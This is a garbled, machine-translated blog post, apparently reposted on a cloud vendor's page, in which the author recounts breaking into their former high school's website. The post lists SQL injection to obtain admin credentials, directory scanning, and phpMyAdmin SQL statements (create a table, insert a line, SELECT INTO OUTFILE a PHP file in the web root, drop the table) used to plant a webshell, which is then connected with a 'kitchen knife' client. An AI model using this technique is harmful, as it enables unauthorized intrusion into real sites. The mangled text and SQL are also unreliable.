Use phpmyadmin to intrude asp websites

Source: Internet
Author: User

Phpmyadmin handles asp websites.

My high school alma mater used to use the user name and password in the background.

There are no bright spots. You can only say that you must consider multiple aspects.

Let's talk about the process.

Use the user name and password to find the injection point, and use the user name and password.

The super Administrator did not crack the password, but only one common administrator.

Wscan scanning out of the background

Log on to the background

I tried to upload images many times and failed to upload images. I also used nc to upload images. I tried all the methods I could think.

Website Information

Baidu is a bit old and has injection vulnerabilities, but it is useless to me.

Then I got stuck here. For a long time, I asked a friend and asked him to try it.

He scanned the phpmyadmin directory. In fact, I also scanned the directory, but it may not be noticed, or it is too young. He said

This can be done.

Open

Find some commands on the Internet
The http://www.bkjia.com/phpmyadmin/libraries/select_lang.lib.php

 

First, the physical path is exposed:

Create Table ------ insert a sentence in the table ------- write a sentence into the file ----- Delete the table.

CreateTABLEa (required textnotnull );

InsertINTOa (cmd) VALUES ('');

Selectaskfromaintooutfile 'C:/php/AppServ/www/phpMyAdmin/d. php ';

DropTABLEIFEXISTSa;

Connecting a kitchen knife (I'm so excited to use a kitchen knife for the first time)

The article has no highlights, but uses a php horse that is no longer used by phpmyadmin. Asp websites can do the same.

.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.